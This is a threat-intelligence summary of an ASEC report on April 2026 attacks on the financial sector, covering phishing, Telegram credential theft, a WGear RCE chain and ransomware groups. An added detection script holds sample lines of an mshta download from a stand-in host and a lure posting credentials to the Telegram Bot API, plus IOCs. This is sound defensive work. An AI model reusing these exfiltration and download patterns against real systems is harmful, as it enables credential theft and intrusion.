April 2026 Security Issues in Korean & Global Financial Sector

The article highlights phishing, backdoor-downloader-dropper, and infostealer-ransomware activity targeting the financial sector, with Korean-language lure files, Telegram-based credential theft, and confirmed exploitation of the WGear RCE vulnerability. It also covers dark web sales of financial data and access, plus ransomware activity linked to groups such as Andariel, BlueNoroff, ShinyHunters, Everest, Prinz Eugen, and Qilin. #WGear #GeniexLoader #Andariel #BlueNoroff #ShinyHunters #Everest #PrinzEugen #Qilin

Keypoints

  • Attack Stage 1 phishing, Stage 2 backdoor-downloader-dropper, and Stage 3 infostealer-ransomware were identified as the top malware patterns in the financial sector.
  • Korean phishing and malware distribution used disguised file names such as work documents, tax/payment proofs, HR documents, and contract-related lures to build trust.
  • Stolen login IDs and passwords from phishing emails were leaked to attackers through the Telegram API, and January compromises in Korea’s financial sector accounted for 2% of the total.
  • KISA disclosed an RCE vulnerability in Inswave WGear version 1.100.7.0205 and earlier, and a real-world attack chain used mshta, external HTML, and additional payloads to install GeniexLoader.
  • Dark web and forum activity included sales of customer data, account lists, and access for banks and financial firms, including Santander Bank, Deutsche Bank, Banco do Brasil, and others.
  • Ransomware releases attributed to Everest, Prinz Eugen, and Qilin involved victims such as Citizens Bank, Standard Bank, and Manulife Wealth & Asset Management.
  • Access sales included root access to a Linux firewall, core API access, and IDOR access to financial firms, showing ongoing risk of breaches, ransomware, and fraud.

MITRE Techniques

  • [T1566.001] Phishing: Spearphishing Attachment – Used malicious email attachments and HTML files disguised as invoices, notices, and work documents to induce trust (‘work documents, tax and payment proofs, and HR and contract documents’).
  • [T1566.002] Phishing: Spearphishing Link – Sent phishing emails with malicious links to a login page to capture credentials (‘phishing emails with keywords such as remittance, receipt, voicemail, malicious links, and HTML files were sent to the login page’).
  • [T1001] Data Obfuscation – Used Telegram API and chat rooms as an exfiltration channel for stolen credentials (‘the entered account ID and password were sent to the threat actor’s Telegram chat room’).
  • [T1105] Ingress Tool Transfer – Downloaded additional payloads from external HTML and then executed them (‘which then downloaded and executed additional payloads’).
  • [T1059.003] Command and Scripting Interpreter: Windows Command Shell – Executed a .bat file as part of malware delivery (‘RFQ-097970-H2551-NO-20897–0976-order.bat’).
  • [T1218.005] System Binary Proxy Execution: Mshta – Used mshta to launch external HTML and continue the attack chain (‘a WGear process executed mshta to call external HTML’).
  • [T1204] User Execution – Relied on users opening deceptive files and documents to trigger infection (‘disguised them as work documents’).
  • [T1068] Exploitation for Privilege Escalation – Abused the WGear RCE flaw to remotely execute arbitrary code (‘allows threat actors to remotely execute arbitrary code’).
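Two of the behaviours above are easy to turn into defender-side checks: the WGear-to-mshta process chain that fetches external HTML (T1218.005 followed by T1105), and phishing HTML lures that post captured credentials to the Telegram Bot API. The following is an added example, not code from the ASEC report or from Inswave; the process events and lure HTML are constructed for illustration, and the WGear image name and install path used for matching are assumptions that should be replaced with the values seen in your own telemetry.

```python
"""
Added example (not from the original report): two small detection checks.

  1. mshta.exe launched with a remote URL by a WGear parent process.
  2. A phishing HTML lure that sends form data to api.telegram.org.

Sample events and HTML are constructed; the WGear image name is an assumption.
"""
import re
from dataclasses import dataclass

# Assumption: WGear's process image contains "wgear"; adjust to the real image name.
WGEAR_IMAGE = re.compile(r"wgear", re.IGNORECASE)
REMOTE_URL = re.compile(r"https?://", re.IGNORECASE)
# Telegram Bot API URL shape: https://api.telegram.org/bot<id>:<token>/<method>
TELEGRAM_API = re.compile(
    r"https?://api\.telegram\.org/bot(\d+):([A-Za-z0-9_-]+)/(sendMessage|sendDocument)",
    re.IGNORECASE,
)


@dataclass
class ProcEvent:
    pid: int
    ppid: int
    image: str
    cmdline: str


def flag_mshta_from_wgear(events):
    """Return mshta.exe events whose parent is WGear and whose command line holds a remote URL."""
    by_pid = {e.pid: e for e in events}
    hits = []
    for e in events:
        if not e.image.lower().endswith("mshta.exe"):
            continue
        parent = by_pid.get(e.ppid)
        if parent is None or not WGEAR_IMAGE.search(parent.image):
            continue
        if REMOTE_URL.search(e.cmdline):
            hits.append(e)
    return hits


def find_telegram_exfil(html):
    """Return Telegram bot references found in a lure; the token is truncated, not reported in full."""
    findings = []
    for m in TELEGRAM_API.finditer(html):
        bot_id, token, method = m.groups()
        findings.append({"bot_id": bot_id, "method": method, "token_prefix": token[:4] + "..."})
    return findings


# Constructed process-creation events (pid, ppid, image, command line).
SAMPLE_EVENTS = [
    ProcEvent(100, 1, r"C:\Windows\explorer.exe", "explorer.exe"),
    # Assumed install path; the report does not give one.
    ProcEvent(200, 100, r"C:\EXAMPLE_PATH\WGear.exe", "WGear.exe"),
    ProcEvent(300, 200, r"C:\Windows\System32\mshta.exe", "mshta.exe http://example.invalid/page.html"),
    # Local .hta launched by explorer: not the pattern we are looking for.
    ProcEvent(400, 100, r"C:\Windows\System32\mshta.exe", r"mshta.exe C:\Users\u\local.hta"),
]

# Constructed lure page with a placeholder bot token.
SAMPLE_LURE_HTML = """
<form id="login"><input name="id"><input name="pw" type="password"></form>
<script>
fetch("https://api.telegram.org/bot1234567890:AAExampleTokenPlaceholder/sendMessage",
      {method: "POST"});
</script>
"""

if __name__ == "__main__":
    for hit in flag_mshta_from_wgear(SAMPLE_EVENTS):
        print(f"suspicious mshta launch: pid={hit.pid} cmd={hit.cmdline}")
    for f in find_telegram_exfil(SAMPLE_LURE_HTML):
        print(f"telegram exfil reference: bot_id={f['bot_id']} method={f['method']}")
```

The process check keys on parent lineage plus a remote URL on the mshta command line, so an mshta launch of a local .hta by a different parent is not flagged; the HTML check reports only the bot ID and a token prefix so a finding can be shared without copying the attacker's credential into a ticket.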

Indicators of Compromise

  • [File names] Korean phishing and malware lure files – RFQ-097970-H2551-NO-20897–0976-order.bat, -송금내역NoticeSecure.htm, and other disguised document names
  • [File names] Additional lure/executable files – 단가인상문–**260413-1.pdf, RemittanceDetailedInformationSecure.htm, and Resume260407I will be a candidate who is sincere and consistent in all things.exe
  • [MD5 hashes] Identified distribution files – 15adac4d6fc1bddb0c940cdc0c6605b4, 53636c80d43a3c461dc8a3d2a2f2d4e1, and 3 more hashes
  • [Software/version] Vulnerable banking software – Inswave WGear version 1.100.7.0205 and earlier
  • [Organizations] Victim and target organizations mentioned in dark web and ransomware activity – Santander Bank, Deutsche Bank, Banco do Brasil, Citizens Bank, Standard Bank, and Manulife Wealth & Asset Management
  • [Threat actors/groups] Actors and marketplaces mentioned in the report – Andariel, BlueNoroff, ShinyHunters, Everest, Prinz Eugen, and Qilin

Read more: https://asec.ahnlab.com/en/93805/